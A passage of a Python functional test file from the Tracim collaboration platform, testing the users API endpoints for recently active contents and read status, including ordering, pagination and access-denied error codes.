"MIT"
] | null | null | null |
backend/tracim_backend/tests/functional/test_user.py
|
lezardrouge/tracim
|
713ff6066767554333e7e0b1de608ec1a7e4229c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tests for /api/v2/users subpath endpoints.
"""
import pytest
import transaction
from tracim_backend import AuthType
from tracim_backend.app_models.contents import content_type_list
from tracim_backend.error import ErrorCode
from tracim_backend.extensions import app_list
from tracim_backend.fixtures.content import Content as ContentFixtures
from tracim_backend.fixtures.users_and_groups import Base as BaseFixture
from tracim_backend.lib.core.application import ApplicationApi
from tracim_backend.lib.core.content import ContentApi
from tracim_backend.lib.core.group import GroupApi
from tracim_backend.lib.core.user import UserApi
from tracim_backend.lib.core.userworkspace import RoleApi
from tracim_backend.lib.core.workspace import WorkspaceApi
from tracim_backend.models.auth import User
from tracim_backend.models.data import UserRoleInWorkspace
from tracim_backend.models.revision_protection import new_revision
from tracim_backend.models.setup_models import get_tm_session
from tracim_backend.tests import FunctionalTest
from tracim_backend.tests import MailHogFunctionalTest
class TestUserRecentlyActiveContentEndpoint(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active
"""
fixtures = [BaseFixture]
def test_api__get_recently_active_content__ok__200__admin(self):
    """GET a user's recently-active workspace contents as admin: 200 + ordering.

    Builds two workspaces, gives a fresh reader user access to one, then
    creates pages whose "last activity" is driven three ways (a comment,
    an update, plain creation) and asserts the endpoint lists the 7
    contents of that workspace newest-activity-first, excluding the
    comment itself and the other workspace's content.

    NOTE(review): indentation of this excerpt was lost in extraction and
    has been reconstructed; statement order is unchanged.
    """
    # init DB
    dbsession = get_tm_session(self.session_factory, transaction.manager)
    admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
    workspace = WorkspaceApi(
        current_user=admin, session=dbsession, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    # Second workspace: its content must NOT appear in the response.
    workspace2 = WorkspaceApi(
        current_user=admin, session=dbsession, config=self.app_config
    ).create_workspace("test workspace2", save_now=True)
    uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
    gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
    groups = [gapi.get_one_with_name("users")]
    # The target user whose recently-active view the admin will request.
    test_user = uapi.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=groups,
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
    rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
    main_folder_workspace2 = api.create(
        content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
    )
    main_folder = api.create(
        content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
    )
    # creation order test
    firstly_created = api.create(
        content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
    )
    secondly_created = api.create(
        content_type_list.Page.slug,
        workspace,
        main_folder,
        "another creation_order_test",
        "",
        True,
    )
    # update order test
    firstly_created_but_recently_updated = api.create(
        content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
    )
    secondly_created_but_not_updated = api.create(
        content_type_list.Page.slug,
        workspace,
        main_folder,
        "another update_order_test",
        "",
        True,
    )
    # An update bumps this page's activity above its younger sibling.
    with new_revision(
        session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
    ):
        firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
    # comment change order
    firstly_created_but_recently_commented = api.create(
        content_type_list.Page.slug,
        workspace,
        main_folder,
        "this is randomized label content",
        "",
        True,
    )
    secondly_created_but_not_commented = api.create(
        content_type_list.Page.slug,
        workspace,
        main_folder,
        "this is another randomized label content",
        "",
        True,
    )
    # A comment also bumps its parent page's activity.
    api.create_comment(
        workspace, firstly_created_but_recently_commented, "juste a super comment", True
    )
    # Content in the other workspace — must be absent from the response.
    api.create(
        content_type_list.Page.slug,
        workspace2,
        main_folder_workspace2,
        "content_workspace_2",
        "",
        True,
    )
    dbsession.flush()
    transaction.commit()
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    res = self.testapp.get(
        "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active".format(
            user_id=test_user.user_id, workspace_id=workspace.workspace_id
        ),
        status=200,
    )
    res = res.json_body
    # 7 contents: the folder plus six pages; the comment is excluded.
    assert len(res) == 7
    # Schema check on every returned content entry.
    for elem in res:
        assert isinstance(elem["content_id"], int)
        assert isinstance(elem["content_type"], str)
        assert elem["content_type"] != "comments"
        assert isinstance(elem["is_archived"], bool)
        assert isinstance(elem["is_deleted"], bool)
        assert isinstance(elem["label"], str)
        assert isinstance(elem["parent_id"], int) or elem["parent_id"] is None
        assert isinstance(elem["show_in_ui"], bool)
        assert isinstance(elem["slug"], str)
        assert isinstance(elem["status"], str)
        assert isinstance(elem["sub_content_types"], list)
        for sub_content_type in elem["sub_content_types"]:
            assert isinstance(sub_content_type, str)
        assert isinstance(elem["workspace_id"], int)
    # comment is newest than page2
    assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
    assert res[1]["content_id"] == secondly_created_but_not_commented.content_id
    # last updated content is newer than other one despite creation
    # of the other is more recent
    assert res[2]["content_id"] == firstly_created_but_recently_updated.content_id
    assert res[3]["content_id"] == secondly_created_but_not_updated.content_id
    # creation order is inverted here as last created is last active
    assert res[4]["content_id"] == secondly_created.content_id
    assert res[5]["content_id"] == firstly_created.content_id
    # folder subcontent modification does not change folder order
    assert res[6]["content_id"] == main_folder.content_id
    def test_api__get_recently_active_content__err__400__no_access_to_workspace(self):
        """
        Asking for the recently active contents of a workspace the target user
        has no role in must fail with HTTP 400 and the WORKSPACE_NOT_FOUND
        error code.
        """
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        workspace2 = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace2", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        # test_user deliberately gets NO role in "workspace": that missing
        # role is what should trigger the 400 below.
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder_workspace2 = api.create(
            content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
        )
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another creation_order_test",
            "",
            True,
        )
        # update order test
        firstly_created_but_recently_updated = api.create(
            content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another update_order_test",
            "",
            True,
        )
        with new_revision(
            session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
        ):
            firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
        # comment change order
        firstly_created_but_recently_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is randomized label content",
            "",
            True,
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is another randomized label content",
            "",
            True,
        )
        api.create_comment(
            workspace, firstly_created_but_recently_commented, "juste a super comment", True
        )
        # content in workspace2 must never leak into the workspace results
        api.create(
            content_type_list.Page.slug,
            workspace2,
            main_folder_workspace2,
            "content_workspace_2",
            "",
            True,
        )
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=400,
        )
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.WORKSPACE_NOT_FOUND
    def test_api__get_recently_active_content__ok__200__user_itself(self):
        """
        A user with a READER role can list his own recently active contents;
        results are ordered newest-activity-first and exclude comments.
        """
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        workspace2 = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace2", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder_workspace2 = api.create(
            content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
        )
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        secondly_created = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another creation_order_test",
            "",
            True,
        )
        # update order test
        firstly_created_but_recently_updated = api.create(
            content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
        )
        secondly_created_but_not_updated = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another update_order_test",
            "",
            True,
        )
        with new_revision(
            session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
        ):
            firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
        # comment change order
        firstly_created_but_recently_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is randomized label content",
            "",
            True,
        )
        secondly_created_but_not_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is another randomized label content",
            "",
            True,
        )
        api.create_comment(
            workspace, firstly_created_but_recently_commented, "juste a super comment", True
        )
        # content in workspace2 must never appear in the workspace results
        api.create(
            content_type_list.Page.slug,
            workspace2,
            main_folder_workspace2,
            "content_workspace_2",
            "",
            True,
        )
        dbsession.flush()
        transaction.commit()
        # the user queries his own recently active contents
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        res = res.json_body
        assert len(res) == 7
        for elem in res:
            assert isinstance(elem["content_id"], int)
            assert isinstance(elem["content_type"], str)
            assert elem["content_type"] != "comments"
            assert isinstance(elem["is_archived"], bool)
            assert isinstance(elem["is_deleted"], bool)
            assert isinstance(elem["label"], str)
            assert isinstance(elem["parent_id"], int) or elem["parent_id"] is None
            assert isinstance(elem["show_in_ui"], bool)
            assert isinstance(elem["slug"], str)
            assert isinstance(elem["status"], str)
            assert isinstance(elem["sub_content_types"], list)
            for sub_content_type in elem["sub_content_types"]:
                assert isinstance(sub_content_type, str)
            assert isinstance(elem["workspace_id"], int)
        # the new comment makes its parent more recently active than page2
        assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
        assert res[1]["content_id"] == secondly_created_but_not_commented.content_id
        # last updated content is newer than other one despite creation
        # of the other is more recent
        assert res[2]["content_id"] == firstly_created_but_recently_updated.content_id
        assert res[3]["content_id"] == secondly_created_but_not_updated.content_id
        # creation order is inverted here as last created is last active
        assert res[4]["content_id"] == secondly_created.content_id
        assert res[5]["content_id"] == firstly_created.content_id
        # folder subcontent modification does not change folder order
        assert res[6]["content_id"] == main_folder.content_id
    def test_api__get_recently_active_content__err__403__other_user(self):
        """
        A plain user asking for ANOTHER user's recently active contents must
        be rejected with HTTP 403 and INSUFFICIENT_USER_PROFILE.
        """
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        workspace2 = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace2", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder_workspace2 = api.create(
            content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
        )
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another creation_order_test",
            "",
            True,
        )
        # update order test
        firstly_created_but_recently_updated = api.create(
            content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another update_order_test",
            "",
            True,
        )
        with new_revision(
            session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
        ):
            firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
        # comment change order
        firstly_created_but_recently_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is randomized label content",
            "",
            True,
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is another randomized label content",
            "",
            True,
        )
        api.create_comment(
            workspace, firstly_created_but_recently_commented, "juste a super comment", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace2,
            main_folder_workspace2,
            "content_workspace_2",
            "",
            True,
        )
        dbsession.flush()
        transaction.commit()
        # authenticate as test_user but request admin's data -> forbidden
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=403,
        )
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
    def test_api__get_recently_active_content__ok__200__limit_2_multiple(self):
        """
        Paginate recently active contents: first page via limit=2, second page
        via limit=2 + before_content_id anchored on the last item of page one.
        """
        # TODO - G.M - 2018-07-20 - Better fix for this test, do not use sleep()
        # anymore to fix datetime lack of precision.
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        workspace2 = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace2", save_now=True)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder_workspace2 = api.create(
            content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
        )
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another creation_order_test",
            "",
            True,
        )
        # update order test
        firstly_created_but_recently_updated = api.create(
            content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
        )
        secondly_created_but_not_updated = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another update_order_test",
            "",
            True,
        )
        with new_revision(
            session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
        ):
            firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
        # comment change order
        firstly_created_but_recently_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is randomized label content",
            "",
            True,
        )
        secondly_created_but_not_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is another randomized label content",
            "",
            True,
        )
        api.create_comment(
            workspace, firstly_created_but_recently_commented, "juste a super comment", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace2,
            main_folder_workspace2,
            "content_workspace_2",
            "",
            True,
        )
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # first page: two most recently active contents
        params = {"limit": 2}
        res = self.testapp.get(
            "/api/v2/users/1/workspaces/{}/contents/recently_active".format(workspace.workspace_id),
            status=200,
            params=params,
        )
        res = res.json_body
        assert len(res) == 2
        for elem in res:
            assert isinstance(elem["content_id"], int)
            assert isinstance(elem["content_type"], str)
            assert elem["content_type"] != "comments"
            assert isinstance(elem["is_archived"], bool)
            assert isinstance(elem["is_deleted"], bool)
            assert isinstance(elem["label"], str)
            assert isinstance(elem["parent_id"], int) or elem["parent_id"] is None
            assert isinstance(elem["show_in_ui"], bool)
            assert isinstance(elem["slug"], str)
            assert isinstance(elem["status"], str)
            assert isinstance(elem["sub_content_types"], list)
            for sub_content_type in elem["sub_content_types"]:
                assert isinstance(sub_content_type, str)
            assert isinstance(elem["workspace_id"], int)
        # the new comment makes its parent more recently active than page2
        assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
        assert res[1]["content_id"] == secondly_created_but_not_commented.content_id
        # second page: anchor on the last content_id of the first page
        params = {"limit": 2, "before_content_id": secondly_created_but_not_commented.content_id}
        res = self.testapp.get(
            "/api/v2/users/1/workspaces/{}/contents/recently_active".format(workspace.workspace_id),
            status=200,
            params=params,
        )
        res = res.json_body
        assert len(res) == 2
        # last updated content is newer than other one despite creation
        # of the other is more recent
        assert res[0]["content_id"] == firstly_created_but_recently_updated.content_id
        assert res[1]["content_id"] == secondly_created_but_not_updated.content_id
    def test_api__get_recently_active_content__err__400__bad_before_content_id(self):
        """
        Passing a before_content_id that matches no content must fail with
        HTTP 400 and the CONTENT_NOT_FOUND error code.
        """
        # TODO - G.M - 2018-07-20 - Better fix for this test, do not use sleep()
        # anymore to fix datetime lack of precision.
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        workspace2 = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace2", save_now=True)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder_workspace2 = api.create(
            content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
        )
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another creation_order_test",
            "",
            True,
        )
        # update order test
        firstly_created_but_recently_updated = api.create(
            content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another update_order_test",
            "",
            True,
        )
        with new_revision(
            session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
        ):
            firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
        # comment change order
        firstly_created_but_recently_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is randomized label content",
            "",
            True,
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is another randomized label content",
            "",
            True,
        )
        api.create_comment(
            workspace, firstly_created_but_recently_commented, "juste a super comment", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace2,
            main_folder_workspace2,
            "content_workspace_2",
            "",
            True,
        )
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # 4000 does not exist in the freshly created DB fixtures
        params = {"before_content_id": 4000}
        res = self.testapp.get(
            "/api/v2/users/1/workspaces/{}/contents/recently_active".format(workspace.workspace_id),
            status=400,
            params=params,
        )
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.CONTENT_NOT_FOUND
class TestUserReadStatusEndpoint(FunctionalTest):
    """
    Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status
    """

    def test_api__get_read_status__ok__200__admin(self):
        """
        An admin can read his own read-status list; items come back ordered by
        most recent activity first (comments bump their parent content).
        """
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        workspace2 = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace2", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder_workspace2 = api.create(
            content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
        )
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        secondly_created = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another creation_order_test",
            "",
            True,
        )
        # update order test
        firstly_created_but_recently_updated = api.create(
            content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
        )
        secondly_created_but_not_updated = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another update_order_test",
            "",
            True,
        )
        with new_revision(
            session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
        ):
            firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
        # comment change order
        firstly_created_but_recently_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is randomized label content",
            "",
            True,
        )
        secondly_created_but_not_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is another randomized label content",
            "",
            True,
        )
        api.create_comment(
            workspace, firstly_created_but_recently_commented, "juste a super comment", True
        )
        # content in workspace2 must never appear in the workspace results
        api.create(
            content_type_list.Page.slug,
            workspace2,
            main_folder_workspace2,
            "content_workspace_2",
            "",
            True,
        )
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        res = res.json_body
        assert len(res) == 7
        for elem in res:
            assert isinstance(elem["content_id"], int)
            assert isinstance(elem["read_by_user"], bool)
        # the new comment makes its parent more recently active than page2
        assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
        assert res[1]["content_id"] == secondly_created_but_not_commented.content_id
        # last updated content is newer than other one despite creation
        # of the other is more recent
        assert res[2]["content_id"] == firstly_created_but_recently_updated.content_id
        assert res[3]["content_id"] == secondly_created_but_not_updated.content_id
        # creation order is inverted here as last created is last active
        assert res[4]["content_id"] == secondly_created.content_id
        assert res[5]["content_id"] == firstly_created.content_id
        # folder subcontent modification does not change folder order
        assert res[6]["content_id"] == main_folder.content_id

    def test_api__get_read_status__ok__200__user_itself(self):
        """
        A user can read his own read statuses, filtered to an explicit
        content_ids list; the response keeps activity ordering.
        """
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        workspace2 = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace2", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder_workspace2 = api.create(
            content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
        )
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another creation_order_test",
            "",
            True,
        )
        # update order test
        firstly_created_but_recently_updated = api.create(
            content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another update_order_test",
            "",
            True,
        )
        with new_revision(
            session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
        ):
            firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
        # comment change order
        firstly_created_but_recently_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is randomized label content",
            "",
            True,
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is another randomized label content",
            "",
            True,
        )
        api.create_comment(
            workspace, firstly_created_but_recently_commented, "juste a super comment", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace2,
            main_folder_workspace2,
            "content_workspace_2",
            "",
            True,
        )
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        # only ask for these four contents via the content_ids query param
        selected_contents_id = [
            firstly_created_but_recently_commented.content_id,
            firstly_created_but_recently_updated.content_id,
            firstly_created.content_id,
            main_folder.content_id,
        ]
        params = {
            "content_ids": "{cid1},{cid2},{cid3},{cid4}".format(
                cid1=selected_contents_id[0],
                cid2=selected_contents_id[1],
                cid3=selected_contents_id[2],
                cid4=selected_contents_id[3],
            )
        }
        url = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
            workspace_id=workspace.workspace_id, user_id=test_user.user_id
        )
        res = self.testapp.get(url=url, status=200, params=params)
        res = res.json_body
        assert len(res) == 4
        for elem in res:
            assert isinstance(elem["content_id"], int)
            assert isinstance(elem["read_by_user"], bool)
        # the new comment makes its parent the most recently active
        assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
        # last updated content is newer than other one despite creation
        # of the other is more recent
        assert res[1]["content_id"] == firstly_created_but_recently_updated.content_id
        # creation order is inverted here as last created is last active
        assert res[2]["content_id"] == firstly_created.content_id
        # folder subcontent modification does not change folder order
        assert res[3]["content_id"] == main_folder.content_id

    def test_api__get_read_status__err__403__other_user(self):
        """
        A plain user asking for ANOTHER user's read statuses must be rejected
        with HTTP 403 and INSUFFICIENT_USER_PROFILE.
        """
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        workspace2 = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace2", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder_workspace2 = api.create(
            content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
        )
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
